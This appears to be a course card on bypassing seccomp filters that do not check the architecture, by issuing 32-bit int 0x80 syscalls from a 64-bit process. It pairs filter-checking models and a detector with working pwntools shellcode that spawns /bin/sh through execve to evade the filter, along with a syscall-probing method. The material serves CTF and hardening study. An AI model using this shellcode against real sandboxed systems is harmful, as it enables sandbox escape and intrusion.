Advanced seccomp Bypass: 32-Bit int 0x80 Syscall Table Exploitation Outside 64-Bit Filter Coverage

binary_exploitation Difficulty 1–5 30 min certifiable

Theory

Why This Matters

Advanced seccomp bypasses exploit mismatches between what a filter assumes and how the kernel actually dispatches syscalls. One of the most reliable techniques is the 32-bit syscall entry (int 0x80) in a 64-bit process: if the BPF filter compares syscall numbers against the x86_64 table but never checks the architecture, a 32-bit execve (syscall number 11 on i386, not 59 as on x86_64) is judged as if it were x86_64 syscall 11 (munmap) and goes through whenever the filter allows that number. This bypass has been demonstrated in multiple CTF competitions and real hardening audits. NICE S0131 (develop exploits) and T0286 (develop cyber tools) require familiarity with the kernel's dual syscall path and how to craft shellcode that exploits mode gaps.

Core Concept

Two syscall entry points on x86_64 Linux:
1. syscall instruction: invokes the 64-bit syscall table (sys_call_table). Syscall numbers come from <asm/unistd_64.h>.
2. int 0x80 instruction: invokes the 32-bit IA32 compatibility syscall table (ia32_sys_call_table). Syscall numbers come from <asm/unistd_32.h>.

A seccomp BPF filter written for a 64-bit process typically checks the syscall number loaded from offsetof(struct seccomp_data, nr), which is the 64-bit syscall number when the syscall instruction is used, or the 32-bit syscall number when int 0x80 is used. However, the architecture field (offsetof(struct seccomp_data, arch)) differs:
- syscall on x86_64: arch = AUDIT_ARCH_X86_64 = 0xC000003E
- int 0x80 in an x86_64 process: arch = AUDIT_ARCH_I386 = 0x40000003

A well-written filter blocks the I386 architecture immediately:

A = arch
if (A != ARCH_X86_64) KILL    # blocks int 0x80 path

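A poorly written filter checks only the syscall number, not the architecture. In that case an int 0x80 call is evaluated as if its i386 number were an x86_64 number: an allowlist lets it through when the number coincides with an allowed 64-bit syscall, and a denylist lets it through when the number is simply not on the list (i386 execve is 11, while the denylist blocks 59).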
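The difference between the two filter styles can be sketched as a small user-space model. This is not real BPF: it only packs a struct seccomp_data the way the kernel lays it out (nr at offset 0, arch at offset 4) and applies the same two checks. The allowlist contents and the function names are assumptions made for illustration.

```python
import struct

AUDIT_ARCH_X86_64 = 0xC000003E
AUDIT_ARCH_I386 = 0x40000003

# struct seccomp_data { int nr; __u32 arch; __u64 instruction_pointer; __u64 args[6]; }
SECCOMP_DATA = struct.Struct("<iIQ6Q")
OFF_NR, OFF_ARCH = 0, 4

def make_data(nr, arch):
    """Pack a seccomp_data record with zeroed instruction pointer and arguments."""
    return SECCOMP_DATA.pack(nr, arch, 0, *([0] * 6))

def load32(data, offset):
    """Model of a BPF 32-bit absolute load from seccomp_data."""
    return struct.unpack_from("<I", data, offset)[0]

# Hypothetical allowlist written with x86_64 numbers: read, write, munmap, exit
ALLOWED_X86_64 = {0, 1, 11, 60}

def number_only_filter(data):
    return "ALLOW" if load32(data, OFF_NR) in ALLOWED_X86_64 else "KILL"

def arch_checked_filter(data):
    if load32(data, OFF_ARCH) != AUDIT_ARCH_X86_64:
        return "KILL"
    return number_only_filter(data)

execve_via_syscall = make_data(59, AUDIT_ARCH_X86_64)  # syscall instruction
execve_via_int80 = make_data(11, AUDIT_ARCH_I386)      # int 0x80

print(number_only_filter(execve_via_syscall))  # KILL
print(number_only_filter(execve_via_int80))    # ALLOW (11 is read as munmap)
print(arch_checked_filter(execve_via_int80))   # KILL
```

The number-only model allows the int 0x80 call only because 11 happens to be in the allowlist; with a different allowlist the same call would be rejected.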

SECCOMP_RET_ERRNO vs SECCOMP_RET_KILL:
- SECCOMP_RET_ERRNO | errnum: the syscall is not executed and returns -errnum to the process. The process continues running, so an attacker who handles the error can attempt alternative paths.
- SECCOMP_RET_KILL_THREAD: the offending thread is killed immediately. Unrecoverable.
- SECCOMP_RET_KILL_PROCESS (since Linux 4.14): the entire process (every thread in the thread group) is killed, not just the offending thread.
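When reading raw filter return values (the K field of a BPF ret instruction), the action sits in the upper 16 bits and the data, such as the errno, in the lower 16 bits. A minimal decoding sketch, using the constants from <linux/seccomp.h>; the helper name decode_ret is hypothetical:

```python
import errno

SECCOMP_RET_ACTION_FULL = 0xFFFF0000
SECCOMP_RET_DATA = 0x0000FFFF

ACTIONS = {
    0x80000000: "KILL_PROCESS",
    0x00000000: "KILL_THREAD",
    0x00030000: "TRAP",
    0x00050000: "ERRNO",
    0x7FC00000: "USER_NOTIF",
    0x7FF00000: "TRACE",
    0x7FFC0000: "LOG",
    0x7FFF0000: "ALLOW",
}

def decode_ret(value):
    """Split a seccomp return value into (action name, 16-bit data)."""
    action = ACTIONS.get(value & SECCOMP_RET_ACTION_FULL, "UNKNOWN")
    return action, value & SECCOMP_RET_DATA

print(decode_ret(0x00050000 | errno.EPERM))  # ('ERRNO', 1)
print(decode_ret(0x7FFF0000))                # ('ALLOW', 0)
print(decode_ret(0x80000000))                # ('KILL_PROCESS', 0)
```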

In ERRNO mode, an attacker can use the error return to enumerate which syscalls are allowed: try each one, if it returns EPERM (or the configured errno) it is blocked; if it returns any other error (including ENOSYS for nonexistent syscalls) or succeeds, it is allowed.
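The classification rule above can be sketched as a small helper. It assumes the probe results have already been collected as raw return values (negative errno on failure); the sample data and the name classify are hypothetical, not output from a real target.

```python
import errno

def classify(results, blocked_errno=errno.EPERM):
    """Split {syscall_nr: raw return value} into (allowed, blocked) lists.

    A return of -blocked_errno is treated as a filter verdict; anything else
    (success or a different error) is treated as having reached the kernel.
    """
    allowed, blocked = [], []
    for nr, ret in sorted(results.items()):
        (blocked if ret == -blocked_errno else allowed).append(nr)
    return allowed, blocked

# Hypothetical probe results for illustration only
sample = {
    0: 0,                # succeeded
    1: -errno.EBADF,     # failed inside the kernel, so the filter let it pass
    2: -errno.EPERM,     # blocked by the filter
    59: -errno.EPERM,    # blocked by the filter
    335: -errno.ENOSYS,  # not filtered, but no such syscall
}

allowed, blocked = classify(sample)
print("allowed:", allowed)  # allowed: [0, 1, 335]
print("blocked:", blocked)  # blocked: [2, 59]
```

One limitation of this rule: an allowed syscall can return EPERM for its own reasons, so entries in the blocked list are worth confirming with different arguments.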

Technical Deep-Dive

Detecting the architecture check in seccomp-tools output:

seccomp-tools dump ./challenge
# Look for architecture check at the top:
#  0000: 0x20 0x00 0x00 0x00000004   A = arch
#  0001: 0x15 0x00 0x08 0xc000003e   if (A != ARCH_X86_64) goto KILL
# If lines 0000-0001 are MISSING, the filter doesn't check arch -> int 0x80 bypass possible
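The visual check can be automated with a short parser over saved seccomp-tools dump text. This is a heuristic sketch: it looks only for a 32-bit load of offset 4 (arch) immediately followed by an equality jump against AUDIT_ARCH_X86_64, so a filter that checks arch in some other way would be reported as unchecked. The function name and the sample dumps are assumptions for illustration.

```python
import re

# Matches lines such as " 0001: 0x15 0x00 0x08 0xc000003e  if (A != ARCH_X86_64) ..."
INSN = re.compile(
    r"^\s*\d{4}:\s+0x([0-9a-f]{2})\s+0x[0-9a-f]{2}\s+0x[0-9a-f]{2}\s+0x([0-9a-f]{8})"
)
LD_W_ABS = 0x20   # BPF_LD | BPF_W | BPF_ABS
JEQ_K = 0x15      # BPF_JMP | BPF_JEQ | BPF_K
OFF_ARCH = 4
AUDIT_ARCH_X86_64 = 0xC000003E

def has_arch_check(dump_text):
    """Return True if the dump contains 'A = arch' followed by a compare with X86_64."""
    insns = []
    for line in dump_text.splitlines():
        m = INSN.match(line)
        if m:
            insns.append((int(m.group(1), 16), int(m.group(2), 16)))
    for (code, k), (next_code, next_k) in zip(insns, insns[1:]):
        if (code, k) == (LD_W_ABS, OFF_ARCH) and (next_code, next_k) == (JEQ_K, AUDIT_ARCH_X86_64):
            return True
    return False

# Hypothetical dump excerpts
CHECKED = """\
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x08 0xc000003e  if (A != ARCH_X86_64) goto 0010
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
"""
UNCHECKED = """\
 0000: 0x20 0x00 0x00 0x00000000  A = sys_number
 0001: 0x15 0x00 0x01 0x0000003b  if (A != execve) goto 0003
"""

print(has_arch_check(CHECKED))    # True
print(has_arch_check(UNCHECKED))  # False
```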

Crafting 32-bit shellcode for int 0x80 bypass in a 64-bit process:

from pwn import *

context.arch = 'amd64'   # the code executes in 64-bit mode, so assemble it as amd64

# 32-bit execve via int 0x80:
# eax=11 (execve on i386), ebx=ptr to "/bin/sh", ecx=0 (argv), edx=0 (envp)
# IMPORTANT: int 0x80 dispatches through the i386 syscall table and reads only
# the low 32 bits of each argument register. The stack of a 64-bit process
# normally sits above 4 GiB, so a pointer to a pushed string would be truncated
# and execve would fail with EFAULT. Write the string to memory below 4 GiB
# instead (.bss/.data of a non-PIE binary, or a MAP_32BIT mapping).
# Note: seccomp filters survive execve, so the new program's own 64-bit
# syscalls are still subject to the filter.

# ASSUMPTION: hypothetical writable address below 4 GiB; take the real one
# from the target (for example with readelf -S ./challenge).
LOW_BUF = 0x404800

shellcode_32bit_compat = asm(f"""
    mov  rax, 0x0068732f6e69622f   /* bytes 2f 62 69 6e 2f 73 68 00 = /bin/sh + NUL */
    mov  ebx, {LOW_BUF:#x}         /* ebx = low address, zero-extended into rbx */
    mov  qword ptr [rbx], rax      /* store the string at LOW_BUF */
    xor  ecx, ecx                  /* argv = NULL */
    xor  edx, edx                  /* envp = NULL */
    mov  eax, 11                   /* SYS_execve on i386 = 11 */
    int  0x80                      /* 32-bit syscall entry: seccomp sees arch = AUDIT_ARCH_I386 */
""")

# Combine with a 64-bit ROP chain to reach this shellcode
print(f"shellcode length: {len(shellcode_32bit_compat)}")
print(disasm(shellcode_32bit_compat))

Using strace to enumerate allowed syscalls in ERRNO mode:

# If seccomp uses ERRNO mode, strace shows which calls return EPERM
strace -e trace=all ./challenge 2>&1 | grep EPERM
# Calls not returning EPERM are candidates for the allowed set

# Alternatively, use a syscall fuzzer shellcode that tries each number:
python3 -c "
from pwn import *
context.arch = 'amd64'
# Generate shellcode that tries syscall numbers 0-400 in a loop
# and writes results to a pipe -- advanced, but useful for ERRNO-mode enumeration
"

Reverse Engineering Methodology

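Run seccomp-tools dump and check whether the BPF filter's first instructions load and check arch. If no architecture check is present, the int 0x80 bypass is a candidate: confirm that the i386 numbers you need (for example 11 for execve) receive an ALLOW verdict when the filter treats them as x86_64 numbers.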
Count the number of allowed syscalls. Very restrictive filters (only read/write/exit) require creative alternatives; permissive filters (20+ allowed) have more bypass surface.
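For ERRNO-mode filters: write a short shellcode loop that tries each syscall number (0 to 400) with harmless arguments (all zeros), records whether the return is EPERM or something else, and writes results to stdout. The non-EPERM set is the allowed list. Allowed syscalls really execute, so skip numbers that would end or stall the probe (exit, exit_group, fork, vfork, pause).
Check the kernel version and configuration: seccomp filter mode (SECCOMP_MODE_FILTER) was introduced in Linux 3.5 and has reported the calling convention in seccomp_data.arch since then, so the int 0x80 gap lies in the filter, not in the kernel. The int 0x80 path itself is available to a 64-bit process only when the kernel is built with IA32 emulation (CONFIG_IA32_EMULATION).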

Common Reversing Errors

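Assuming 64-bit shellcode works with int 0x80: int 0x80 uses the 32-bit syscall table and only reads the low 32 bits of register arguments. A 64-bit pointer to /bin/sh with high bits set will be truncated, and the call fails with EFAULT. Pushing the string onto the stack does not help, because the stack of a 64-bit process normally sits above 4 GiB. Place the target string in low memory instead, such as the .bss or .data of a non-PIE binary or a region mapped with MAP_32BIT.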
Missing that SECCOMP_RET_TRACE requires a tracer: if the filter returns TRACE for some syscalls, those require a ptrace tracer to handle them. Without a tracer, the tracee receives ENOSYS. This is not directly exploitable but confirms the filter uses a multi-mode approach.
Confusing syscall numbers between architectures: execve is 59 on x86_64 but 11 on i386. open is 2 on x86_64 but 5 on i386. Always reference the correct unistd header for the calling convention being used.
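Filter installed after fork: some challenges fork a child and install seccomp only in the child. The parent process is unrestricted. If ptrace is available, the parent can influence the child via PTRACE_POKETEXT. Also check which threads are covered: a filter attaches to the calling thread and is inherited by children and threads created afterwards, but threads that already exist stay unfiltered unless the filter was installed with SECCOMP_FILTER_FLAG_TSYNC.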
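The first and third errors above can be caught before any shellcode is written. The following sketch builds the register set that int 0x80 would see and refuses values that would be truncated; the helper name int80_registers and the sample addresses are hypothetical, and the number tables contain only a handful of well-known entries.

```python
# A few well-known syscall numbers per calling convention
I386_NR = {"exit": 1, "read": 3, "write": 4, "open": 5, "execve": 11}
X86_64_NR = {"read": 0, "write": 1, "open": 2, "execve": 59, "exit": 60}

# i386 int 0x80 argument registers, in order
INT80_ARG_REGS = ("ebx", "ecx", "edx", "esi", "edi", "ebp")

def int80_registers(name, *args):
    """Return the register values for an int 0x80 call, or raise if a value
    does not survive truncation to 32 bits."""
    regs = {"eax": I386_NR[name]}
    for reg, value in zip(INT80_ARG_REGS, args):
        if value != value & 0xFFFFFFFF:
            raise ValueError(f"{reg}: {value:#x} does not fit in 32 bits")
        regs[reg] = value
    return regs

# Low address (hypothetical .bss location in a non-PIE binary): accepted
print(int80_registers("execve", 0x404800, 0, 0))

# Typical 64-bit stack address (hypothetical): rejected
try:
    int80_registers("execve", 0x7FFC12345678, 0, 0)
except ValueError as exc:
    print("rejected:", exc)

# The same name maps to different numbers in the two tables
print(I386_NR["execve"], X86_64_NR["execve"])  # 11 59
```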

Challenge Lab

Reinforce your learning with a hands-on generated challenge based on this card's competency.